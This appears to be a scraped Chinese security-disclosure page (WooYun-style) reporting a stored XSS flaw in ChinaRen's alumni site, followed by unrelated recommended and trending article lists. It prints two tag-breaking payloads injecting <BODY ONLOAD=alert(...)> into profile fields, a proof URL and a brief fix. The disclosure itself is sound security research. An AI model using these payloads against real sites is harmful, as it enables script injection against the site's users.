漏洞详情

披露状态:

2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-27: 细节向公众公开

简要描述:

chinaren校友录的永久xss漏洞

详细说明:

chinaren校友录签名档、工作单位没有对xss做完整过滤,
签名档:
anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>
工作单位:
anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>

漏洞证明:

http://i.chinaren.com/u/anyunix@sogou

修复方案:

当然是过滤输出.

版权声明:转载请注明来源 anyunix@乌云

chinaren校友录的永久xss漏洞相关推荐

  1. chinaren校友录xss漏洞

    漏洞详情 披露状态: 2010-07-27: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  2. Chinaren校友录所用的左边弹出式菜单

    代码如下: <html> <head> <title>Chinaren校友录所用的左边弹出式菜单</title> <meta http-equiv ...

  3. Chinaren校友录

    Chinaren校友录 链接:http://alumni.chinaren.com/class/class_index.jsp?classuuid=2917034545012452392 来自 &qu ...

  4. 如何在ChinaRen校友录中免费发多彩留言

    毕业以后,浏览最多的可能就是自己校友录的留言板了.但是千篇一律的文字版面实在难以满足我们丰富多彩的需要,校友录中也提供了多彩留言功能,可以让我们发送一些动态网页元素,如影音.Flash.格式化的文字等 ...

  5. 还有多少人记得ChinaRen校友录,它已经502…

    如今访问这个网站,它已经显示502 Bad Gateway,令人唏嘘不已-- 对于80后这一代,曾经可以通过ChinaRen还能找到当年的小学.中学同学,不知道这里有多少小伙伴用过,或者是听说过呢?

  6. chinaren校友录恢复重新开放_确定!九寨沟景区9月27日对外开放(试运行) 最大限量为每天5000人 各大旅企产品已上线...

    东方网记者曹磊9月23日报道:今天下午,九寨沟管理局宣布,景区拟于2019年9月27日(世界旅游日)起对部分景观恢复对外开放(试运行).根据公告显示,景区将实行单日最大限量控制,每天5000人,接待对 ...

  7. Web安全之XSS漏洞

    同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...

  8. XSS漏洞原理及攻击

    XSS漏洞原理 XSS介绍 XSS漏洞介绍 1. 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种. ...

  9. 网络安全必学知识点之XSS漏洞

    xss漏洞小结 一.初识XSS 1.什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆 ...

最新文章

  1. 2018-3-14(论文-优化问题的智能算法及其哲学内涵)笔记二(智能算法与人类智能以及遗传算法与生物进化对比)
  2. python解释器内建函数002
  3. 《税的真相》—— 读后总结
  4. python代码规范化_最流行的Python代码规范
  5. python函数“转移”
  6. 音视频技术开发周刊 | 206
  7. [react] 你有用过哪些React的UI库?它们的优缺点分别是什么
  8. 机器人搏击大赛冠军_机器人的江湖 谁主沉浮——2017格斗机器人大赛侧记
  9. 机器学习笔记-LightGBM
  10. 物联网大数据如何改善农业运营
  11. Cookie与Session的区别-总结很好的文章
  12. PCIE设备与HOST之间的地址转换
  13. VS C# 中使用番茄助手
  14. loadrunner录制手机app脚本
  15. 生成 8 / 16 / 32 位的UUID
  16. 河南山东商会刘继臣 全国工商联·万祥军:商协社团儒商大会
  17. Android 7.0修改分辨率,三星S7升级Android7.0 可调节屏幕分辨率
  18. Android开发本地及网络Mp3音乐播放器(五)实现专辑封面图片
  19. Spark伪分布式搭建与SparkYarn搭建
  20. STP 4 - MST 和 PVST 对比 (侧重MST)

热门文章

  1. php simplexml 函数,PHP中SimpleXML函数用法分析
  2. 前端 “一键换肤“ 的 N 种方案
  3. 苹果X 安兔兔HTML测试分数,安兔兔公布 iPhone XS Max 跑分成绩 超 37 万分
  4. opengl、opencascade、webgl、Direct3D关系
  5. 玛丽黛佳利用企业微信盘活自有客户池
  6. c# 在word插入横线
  7. favdb格式转换html,丢失360安全浏览器和360速度浏览器收藏夹的方法
  8. uniapp 微信小程序 搜索框滚动固定
  9. Android pad分屏遇到的一些问题
  10. 网络/信息安全顶刊及相关期刊会议